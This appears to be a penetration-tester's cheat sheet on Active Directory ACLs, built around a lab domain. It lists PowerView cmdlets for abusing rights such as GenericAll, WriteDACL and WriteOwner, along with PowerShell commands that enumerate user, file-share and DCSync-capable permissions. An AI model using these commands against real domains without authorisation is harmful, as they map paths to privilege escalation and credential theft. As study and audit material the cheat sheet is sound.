🛂Domain ACLs

Access Control Lists (ACLs)

Types of ACLs

ACL	Description
Discretionary Access Control List (DACL)	This defines which security principals are granted or denied access to an object.
System Access Control Lists (SACL)	These allow administrators to log access attempts made to secured objects.

ACL Abuse

Set-DomainUserPassword	ForceChangePassword
Add-DomainGroupMember	Add Members
Set-DomainUserPassword or Add-DomainGroupMember	GenericAll
Set-DomainObject	GenericWrite
Set-DomainObjectOwner	WriteOwner
Add-DomainObjectACL	WriteDACL
Set-DomainUserPassword or Add-DomainGroupMember	AllExtendedRights

Enumerating ACLs

Get-ADUser (ACL for a Single Domain User)

Code

(Get-ACL "AD:$((Get-ADUser daniel.carter).distinguishedname)").access  | ? {$_.IdentityReference -eq "INLANEFREIGHT\cliff.moore"}

All Users with WriteProperty or GenericAll Rights Over the Target User

Code

(Get-ACL "AD:$((Get-ADUser daniel.carter).distinguishedname)").access  | ? {$_.ActiveDirectoryRights -match "WriteProperty" -or $_.ActiveDirectoryRights -match "GenericAll"} | Select IdentityReference,ActiveDirectoryRights -Unique | ft -W

Get-DomainObjectAcl

Code

Get-DomainObjectAcl -Identity harry.jones -Domain inlanefreight.local -ResolveGUIDs

Find-InterestingDomainAcl

Code

Find-InterestingDomainAcl -Domain inlanefreight.local -ResolveGUIDs

File Shares ACLS

Code

Get-NetShare -ComputerName SQL01

Example

Name             Type Remark        ComputerName
----             ---- ------        ------------
ADMIN$     2147483648 Remote Admin  SQL01
C$         2147483648 Default share SQL01
DB_backups          0               SQL01
IPC$       2147483651 Remote IPC    SQL01

Code

Get-PathAcl "\\SQL01\DB_backups"

Example

Path              : \\SQL01\DB_backups
FileSystemRights  : Read
IdentityReference : Local System
IdentitySID       : S-1-5-18
AccessControlType : Allow

Path              : \\SQL01\DB_backups
FileSystemRights  : Read
IdentityReference : BUILTIN\Administrators
IdentitySID       : S-1-5-32-544
AccessControlType : Allow

Path              : \\SQL01\DB_backups
FileSystemRights  : Read
IdentityReference : BUILTIN\Users
IdentitySID       : S-1-5-32-545
AccessControlType : Allow

Path              : \\SQL01\DB_backups
FileSystemRights  : AppendData/AddSubdirectory
IdentityReference : BUILTIN\Users
IdentitySID       : S-1-5-32-545
AccessControlType : Allow

Path              : \\SQL01\DB_backups
FileSystemRights  : WriteData/AddFile
IdentityReference : BUILTIN\Users
IdentitySID       : S-1-5-32-545
AccessControlType : Allow

Path              : \\SQL01\DB_backups
FileSystemRights  : GenericAll
IdentityReference : Creator Owner
IdentitySID       : S-1-3-0
AccessControlType : Allow

Enumerate DCSync User

A common attack called DCSync requires a user to be delegated a combination of the following three rights:

• Replicating Directory Changes (DS-Replication-Get-Changes)

• Replicating Directory Changes All (DS-Replication-Get-Changes-All)

• Replicating Directory Changes In Filtered Set (DS-Replication-Get-Changes-In-Filtered-Set)

Code

$dcsync = Get-ObjectACL "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')} | Select-Object -ExpandProperty SecurityIdentifier | Select -ExpandProperty value

Convert-SidToName $dcsync